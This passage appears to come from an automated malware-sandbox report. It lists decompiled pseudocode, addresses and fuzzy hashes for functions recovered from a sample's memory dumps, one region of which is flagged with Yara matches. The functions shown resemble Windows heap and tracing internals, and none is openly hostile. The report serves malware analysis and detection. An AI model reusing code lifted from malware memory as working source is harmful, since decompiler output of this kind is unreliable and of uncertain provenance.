													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x54bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x54b84c0;
																			if(_t82 >=  *0x54b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05499063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E053C922A(_t99);
										_t64 = E053E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05498B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x54b86c0; // 0x51007b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x54b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x54b86bc;
													_t87 = 0x54b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E053C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x54b86c4;
												_t87 = 0x54b86c0;
												L27:
												E053F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0541D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x54b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x54b538c = _t51;
						goto L6;
					}
				}
			}

0x053c9082
0x053c9083
0x053c9084
0x053c9085
0x053c9087
0x053c9096
0x053c9098
0x053c9098
0x053c909e
0x053c90a8
0x053c90e7
0x053c90e7
0x053c90aa
0x053c90b0
0x053c90b7
0x053c90bd
0x053c90dd
0x053c90e6
0x053c90bf
0x053c90bf
0x053c90c7
0x053c90cf
0x053c90f1
0x053c90f2
0x053c90f4
0x053c90f5
0x053c90f6
0x053c90f7
0x053c90f8
0x053c90f9
0x053c90fa
0x053c90fb
0x053c90fc
0x053c90fd
0x053c90fe
0x053c90ff
0x053c9100
0x053c9102
0x053c9107
0x053c910c
0x053c9110
0x053c9113
0x053c9115
0x053c9136
0x053c913f
0x053c9143
0x054237e4
0x054237e4
0x053c9117
0x053c9117
0x053c911d
0x00000000
0x053c911f
0x053c911f
0x053c9125
0x00000000
0x053c9127
0x053c912d
0x053c9130
0x053c9134
0x053c9158
0x053c915d
0x053c9161
0x053c9168
0x05423715
0x053c916e
0x053c916e
0x053c9175
0x053c9177
0x053c917e
0x053c917f
0x053c9182
0x053c9182
0x053c9187
0x053c9187
0x053c918a
0x053c918d
0x053c918f
0x053c9192
0x053c9195
0x053c9198
0x053c9198
0x053c9198
0x053c919a
0x00000000
0x00000000
0x0542371f
0x05423721
0x05423727
0x0542372f
0x05423733
0x05423735
0x05423738
0x0542373b
0x0542373d
0x05423740
0x00000000
0x05423746
0x05423746
0x05423749
0x00000000
0x0542374f
0x0542374f
0x05423751
0x05423757
0x05423759
0x0542375c
0x0542375c
0x0542375e
0x0542375e
0x05423761
0x05423764
0x00000000
0x00000000
0x05423766
0x05423768
0x054237a3
0x054237a3
0x054237a5
0x054237a7
0x054237ad
0x054237b0
0x054237b2
0x054237bc
0x054237c2
0x054237c2
0x054237b2
0x053c9187
0x053c9187
0x053c918a
0x053c918d
0x053c918f
0x053c9192
0x053c9195
0x00000000
0x053c9195
0x00000000
0x0542376a
0x0542376a
0x0542376a
0x0542376c
0x0542376c
0x0542376f
0x05423775
0x00000000
0x00000000
0x05423777
0x05423779
0x05423782
0x05423787
0x05423789
0x05423790
0x05423790
0x0542378b
0x0542378b
0x0542378b
0x05423792
0x05423795
0x00000000
0x05423795
0x00000000
0x05423779
0x05423798
0x00000000
0x05423798
0x00000000
0x05423768
0x0542379b
0x0542379b
0x05423751
0x05423749
0x00000000
0x05423740
0x053c91a0
0x053c91a3
0x053c91a9
0x053c91b0
0x00000000
0x053c91b0
0x053c9187
0x053c91b4
0x053c91b4
0x053c91bb
0x053c91c0
0x053c91c5
0x053c91c7
0x054237da
0x053c91cd
0x053c91cd
0x053c91cd
0x053c91d2
0x053c91d5
0x053c9239
0x053c9239
0x053c91d7
0x053c91db
0x053c91e1
0x053c91e7
0x053c91fd
0x053c9203
0x053c921e
0x053c9223
0x00000000
0x053c9205
0x053c9205
0x053c9208
0x053c920c
0x053c9214
0x053c9214
0x053c920c
0x053c91e9
0x053c91e9
0x053c91ee
0x053c91f3
0x053c91f3
0x053c91f3
0x053c91e7
0x00000000
0x00000000
0x00000000
0x053c9134
0x053c9125
0x053c911d
0x053c914e
0x053c90d1
0x053c90d1
0x053c90d3
0x053c90d6
0x053c90d8
0x00000000
0x053c90d8
0x053c90cf

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47181b7465f1a4f9b63046dab586fb7b038bb01a2f04363ee9a46a6b0a652d4d
Instruction ID: 19bb8d8cb0f41f016655269a368cec25b76038b6fdf612e816324cd885be5974
Opcode Fuzzy Hash: 47181b7465f1a4f9b63046dab586fb7b038bb01a2f04363ee9a46a6b0a652d4d
Instruction Fuzzy Hash: EE01F4736112108FD3198F04E880BA2BFBAFB41321F2641AAF5018B791D7B0EC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3AE, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7da52972aacf04ce64c03ddcb7f95734e692821365032a45c799ae20f3700040
Instruction ID: 1bc924a5fec361e3269e974583deee3da9af85f8a6390069b4a54e4047a143d9
Opcode Fuzzy Hash: 7da52972aacf04ce64c03ddcb7f95734e692821365032a45c799ae20f3700040
Instruction Fuzzy Hash: E401D472A0424097C216DB65D842AF7F3A8AB95314F40462EE64D671C2D37569088798

Uniqueness

Uniqueness Score: -1.00%

Function 05494015, Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E05494015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E053E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E053E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x54b86ac);
					E053CF900(0x54b86d4, _t28);
					E053DFFB0(0x54b86ac, _t28, 0x54b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E053DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0549401a
0x0549401e
0x05494023
0x05494028
0x05494029
0x0549402b
0x0549402f
0x05494043
0x05494046
0x05494051
0x05494057
0x0549405f
0x05494062
0x05494067
0x0549406f
0x0549407c
0x0549407c
0x0549408c
0x0549408c
0x05494097

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d7fa866f4f76b2b216b6730b5f242a990bf72e8fbcbac477afb80bf3020416d
Instruction ID: 7a3d14b73433c59167e45b35b5ffd3f022960c7ef13d12b106e1c1c9c76481ed
Opcode Fuzzy Hash: 5d7fa866f4f76b2b216b6730b5f242a990bf72e8fbcbac477afb80bf3020416d
Instruction Fuzzy Hash: 3B018F723019957FD655AB69CD88EA3FBACFB49660B00022AB508C7A51DB74EC12C6F4

Uniqueness

Uniqueness Score: -1.00%

Function 054814FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E054814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x54bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0540FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E053E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0540B640(E05409AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x054814fb
0x054814fb
0x0548150a
0x05481514
0x05481519
0x0548151b
0x05481526
0x0548152c
0x05481534
0x05481537
0x0548153a
0x05481545
0x05481557
0x05481547
0x05481550
0x05481550
0x05481562
0x05481563
0x05481565
0x0548156a
0x0548157f

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad9bb43224cf3902c637cff54f9672a917aabc21ad78a398e33640777ee60836
Instruction ID: e4ea7ca87313657a894cc7f82d444c92a984b6c23012f9295d42d00cf6ba8b4c
Opcode Fuzzy Hash: ad9bb43224cf3902c637cff54f9672a917aabc21ad78a398e33640777ee60836
Instruction Fuzzy Hash: E8019271A00258AFCB14EF69D845EEEBBB8EF44700F10406BF905EB380DA70DA05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0548138A, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0548138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x54bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0540FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E053E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0540B640(E05409AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0548138a
0x0548138a
0x05481399
0x054813a3
0x054813a8
0x054813aa
0x054813b5
0x054813bb
0x054813c3
0x054813c6
0x054813c9
0x054813d4
0x054813e6
0x054813d6
0x054813df
0x054813df
0x054813f1
0x054813f2
0x054813f4
0x054813f9
0x0548140e

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c74d620a17639f5500a50e762b9710fa025735a3b55984a099988aa19586c10
Instruction ID: b34ca6af7265e9ad9b697692dbd4d3dc968a755f3e66e7f1aaf928ed89e057c0
Opcode Fuzzy Hash: 2c74d620a17639f5500a50e762b9710fa025735a3b55984a099988aa19586c10
Instruction Fuzzy Hash: DC014471E04258ABDB14DFA9D845AEEB7B8EF44710F10406BB905AB281D6749A01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 053C58EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E053C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x54bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x53a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E053C5943() != 0 &&  *0x54b5320 > 5) {
					E05447B5E( &_v44, _t27);
					_t22 =  &_v28;
					E05447B5E( &_v28, _t28);
					_t11 = E05447B9C(0x54b5320, 0x53abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0540B640(_t11, _t17, _v8 ^ _t29, 0x53abf15, _t27, _t28);
			}

0x053c58fb
0x053c58fe
0x053c5906
0x053c590a
0x053c593c
0x053c593c
0x053c590c
0x053c590c
0x053c5911
0x00000000
0x053c5913
0x053c5913
0x053c5913
0x053c5911
0x053c591d
0x05421035
0x0542103c
0x0542103f
0x05421056
0x05421056
0x053c593b

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56065a2aead7a4e34a5d3629ba26f078e892748ae923c88ac2ac42d05dd3011
Instruction ID: 12d3b76e0f76e5d13a92b514edac2c699da245a42cb7e2ca1cb92849d02f314e
Opcode Fuzzy Hash: d56065a2aead7a4e34a5d3629ba26f078e892748ae923c88ac2ac42d05dd3011
Instruction Fuzzy Hash: 6E018471B041049BDB14DE29DC099EEBBB9EB40124B9401EEA9059B645DF71ED06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0547FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0547FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x54bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0540FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E053E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0540B640(E05409AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0547fe3f
0x0547fe3f
0x0547fe4e
0x0547fe58
0x0547fe5d
0x0547fe5f
0x0547fe6a
0x0547fe72
0x0547fe75
0x0547fe78
0x0547fe83
0x0547fe95
0x0547fe85
0x0547fe8e
0x0547fe8e
0x0547fea0
0x0547fea1
0x0547fea3
0x0547fea8
0x0547febd

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8ed0eeefd3af9e6882d2d0f27c1e536bf1e391961f160dbe747427eefa75a2
Instruction ID: 1f3c809ffff06cd93da22db1935a5af7f1d2595865cdfa5e2f526efad0cc7185
Opcode Fuzzy Hash: 2e8ed0eeefd3af9e6882d2d0f27c1e536bf1e391961f160dbe747427eefa75a2
Instruction Fuzzy Hash: A6018471E0425CABDB14DFA9D845FEFBBB8EF44700F10406AB900AB381DA70D901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0547FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0547FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x54bd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0540FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E053E7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0540B640(E05409AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0547fec0
0x0547fec0
0x0547fecf
0x0547fed9
0x0547fede
0x0547fee0
0x0547feeb
0x0547fef3
0x0547fef6
0x0547fef9
0x0547ff04
0x0547ff16
0x0547ff06
0x0547ff0f
0x0547ff0f
0x0547ff21
0x0547ff22
0x0547ff24
0x0547ff29
0x0547ff3e

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83041469ad035eda087e3b49db21a6e81be4a5d8257819b70813f9bc6c90e07b
Instruction ID: b193a575c53e0f2724460ff4ccaae095b2b913447c1de67cf209c02a9237b88e
Opcode Fuzzy Hash: 83041469ad035eda087e3b49db21a6e81be4a5d8257819b70813f9bc6c90e07b
Instruction Fuzzy Hash: CC018471E0025CABDB14DBA9D845FEFBBB8EF44700F10406BB901AB381DA70DA01CB95

Uniqueness

Uniqueness Score: -1.00%

Function 053DB02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053DB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E053E7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E05447016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x053db037
0x053db039
0x053db03b
0x053db040
0x0542a60e
0x00000000
0x00000000
0x0542a61d
0x053db04b
0x053db04e
0x0542a627
0x0542a634
0x00000000
0x00000000
0x0542a641
0x0542a653
0x0542a643
0x0542a64c
0x0542a64c
0x0542a65b
0x00000000
0x00000000
0x00000000
0x0542a66c
0x053db057
0x053db057
0x053db057
0x053db046
0x053db046
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 4cbefc3723774185c9f6f7c19f6a804d6905f18babd9e5c18d98f1088bcee2b3
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 0801B172204590DFD322C71DD858FB6B7EDFB41A40F0A40A2E915CBA51D7A8DC40CA20

Uniqueness

Uniqueness Score: -1.00%

Function 05491074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05491074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0549165E(__ebx, 0x54b8ae4, (__edx -  *0x54b8b04 >> 0x14) + (__edx -  *0x54b8b04 >> 0x14), __edi, __ecx, (__edx -  *0x54b8b04 >> 0x14) + (__edx -  *0x54b8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0548AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E053E7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0547FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x05491074
0x05491080
0x05491082
0x0549108a
0x0549108f
0x05491093
0x054910ab
0x054910ab
0x054910c3
0x054910cf
0x054910e1
0x054910d1
0x054910da
0x054910da
0x054910e9
0x054910f5
0x054910f5
0x054910fe

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82c3b4044be21593ff60b948fb19f0ae19fbf75668cf131ccd803fde64653202
Instruction ID: 5b34b6c0f54daae937c16e64ac6fbba019bb89b5369fce87ac16476b14e4e361
Opcode Fuzzy Hash: 82c3b4044be21593ff60b948fb19f0ae19fbf75668cf131ccd803fde64653202
Instruction Fuzzy Hash: 990128726087469FCB14EB29C949B9B7BE9BB84210F04851AF88683790EE71D841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05498ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05498ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x54bd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E053E7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0540B640(E05409AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x05498ed6
0x05498ee5
0x05498eed
0x05498ef0
0x05498efa
0x05498f03
0x05498f0c
0x05498f15
0x05498f24
0x05498f27
0x05498f31
0x05498f43
0x05498f33
0x05498f3c
0x05498f3c
0x05498f4e
0x05498f4f
0x05498f51
0x05498f56
0x05498f69

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b3ce5570f0baded5a3ba7a2d8f4f35800b370f9c18c8a4841a5a3e3a17e51a
Instruction ID: 4ef9efad25bf91bd73d14be0a4beb8d446fae217b8d487060afe34204506b13b
Opcode Fuzzy Hash: b8b3ce5570f0baded5a3ba7a2d8f4f35800b370f9c18c8a4841a5a3e3a17e51a
Instruction Fuzzy Hash: 7711DB70E042599FDB04DFA9D545BAEBBF4FF08300F1442BAE919EB782E6349941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 05498A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E05498A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x54bd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E053E7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0540B640(E05409AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x05498a62
0x05498a71
0x05498a79
0x05498a82
0x05498a85
0x05498a89
0x05498a8c
0x05498a8f
0x05498a92
0x05498a95
0x05498a9f
0x05498ab1
0x05498aa1
0x05498aaa
0x05498aaa
0x05498abc
0x05498abd
0x05498abf
0x05498ac4
0x05498ada

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ab160c7a6e5edb413f99e910336a689ed2c7696c3fc613a88eeeb2a4d5545c
Instruction ID: c712c9e757163fdbbdf6a82705f9fdc54302a874a0bb74f7a1d76b57a245009a
Opcode Fuzzy Hash: 86ab160c7a6e5edb413f99e910336a689ed2c7696c3fc613a88eeeb2a4d5545c
Instruction Fuzzy Hash: 37012C71A0021DAFCB04DFA9D9459EEBBB8FF49310F10406AF905E7381DA34A901CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 053CDB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053CDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E053CDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E053CE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L053CE8B0(__ecx, _t14, 0xfff);
							L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
